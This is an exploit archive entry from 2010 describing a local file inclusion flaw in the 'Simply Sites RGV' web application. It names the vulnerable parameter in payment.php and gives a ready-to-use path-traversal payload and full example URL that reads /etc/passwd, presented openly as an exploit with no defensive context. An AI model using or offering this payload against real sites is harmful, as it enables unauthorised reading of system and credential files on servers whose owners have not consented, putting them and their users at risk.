id: 11554
date: 04/01/2010
title: Simply Sites RGV Local File Inclusion
author: DevilZ TM
cves: 

=====================================
Simply Sites RGV Local File Inclusion 
=====================================

# Title : Simply Sites RGV Local File Inclusion
# Author: DevilZ TM
# Data  : 2010-04-01
 
[~]######################################### InformatioN #############################################[~]
  
[~] Title     : Simply Sites RGV Local File Inclusion
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
  
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/payment.php?page_id=[LFI]
  
[~] ExploiT         :
 
../../../../../../../../etc/passwd
  
[~] Example         :
  
http://127.0.0.1/payment.php?page_id=../../../../../../../../etc/passwd



#  0day.today [2023-03-25]  #